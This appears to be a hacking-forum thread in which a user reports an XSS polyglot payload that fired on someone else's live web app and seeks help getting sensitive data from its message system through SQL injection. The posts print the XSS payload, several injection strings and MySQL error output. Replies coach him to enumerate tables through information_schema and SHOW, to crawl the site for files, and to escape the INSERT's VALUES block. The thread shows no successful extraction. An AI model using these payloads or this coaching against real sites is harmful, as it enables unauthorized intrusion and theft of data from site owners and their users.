XSS Help.

Ok, so ive found a hole in a web page that doesnt need detailing. I used this code: markup';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> and the appropriate box shows up saying 'XSS' , telling me the page is vuln to XSS. But, i also got an OLE DB error, giving me a DB footprint on the page. I know i can execute JS commands with XSS, but my question is, can i execute SQL commands with XSS?

Yeah you can, its called SQL Injection.

Well, it depends on the error…

Obviously the input passes through a database. The XSS you're getting is just icing. I'd focus on injecting SQL commands, it might be a possibility (depending NOT on the error message but rather the way the input is used).

Of course, the error message depends on the input! lol

454447415244 wrote: Of course, the error message depends on the input! lol

Could be the case, yeah. What also could be the case is that the script outputs random (fake) errors to confuse hackers.

This is the error i get when i input the XSS (after the JS box saying 'XSS' pops up)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74 

This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET, and INSERT functions. What i really want to know though, Is there anyway to get sensitive info from this?

Narc0tiX wrote: This is the error i get when i input the XSS (after the JS box saying 'XSS' pops up)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\' at line 1

/W1/Pidgeon.asp, line 74 

This is being injected into a sort of PM system for the web app. It seems as if this is directly affecting the GET, and INSERT functions. What i really want to know though, Is there anyway to get sensitive info from this?

l0l, it is vulnerable to SQL Injection! :happy:

@spyware yeah, but what an ideal system is this! lol It might be the case, but usually vulnerabilities are found in places where the webmaster wasn't aware of! ;) unless he's a dumb ass web develpper! :p

Well, hes a one man army. Im pretty sure hes the only developer. He had staff before, but they all resigned.

Are you sure its vuln to SQL pwn? 'Cuz i injected XSS with JS not SQL…

Ok, so its VERY vuln to SQL injection. But i have another question: whats the best way to find table names? I tried: markup\' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- but i get

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' AND 1=(SELECT COUNT(*) FROM tablenames); --')' at line 1

/W1/Pidgeon.asp, line 74 ```

Which really isnt any info that is useful or relevant to the command...

You could try information_schema.tables or DESCRIBE. Use Intellitamper to find out everything you can about the site. For instance, I was just looking through some files on this one site and found a bunch of table names and descriptions. You never know what you might find. ;)

Yeah, i just used Intellitamper. I found the script that assigns the cookies values, but thats about it. The dev mustve hidden the rest.

then try information_schema.tables or try to guess it

Skunkfoot wrote: You could try information_schema.tables or DESCRIBE.

Not DESCRIBE… that's for when you know the table name and want to know the table fields, types, etc. The other way to discover table names (other than information_schema.tables) would be SHOW. Love that command.

Ok so i inject SQL that contains a \ (backslash) and a ' (single quote) to escape filters. But everytime, i get an error bitching about the syntax associated with the backslash and single quote. But, when i dont include either one of the two, its sends the PM and the page loads normally. Any idea on how to mark up my commands in order to get what i desire?

@Zephyr: Now that I think about it, that makes a lot more sense. >.<

@Other Guy: Post the error? Often times the error message contains useful information.

I get this:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.0.67-community-nt]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SHOW table_name FROM information_schema.tables''')' at line 1

/W1/Pidgeon.asp, line 74 ```

After inputing this
```markup\'SHOW table_name FROM information_schema.tables'```

Looks like you'd need to escape from the VALUES block before you could attempt your injection; otherwise, your query will cause an error because it's still part of the INSERT. Also, from the error message you're getting, you can see how your apostrophe is being "escaped"… so, it looks like you're doing that right.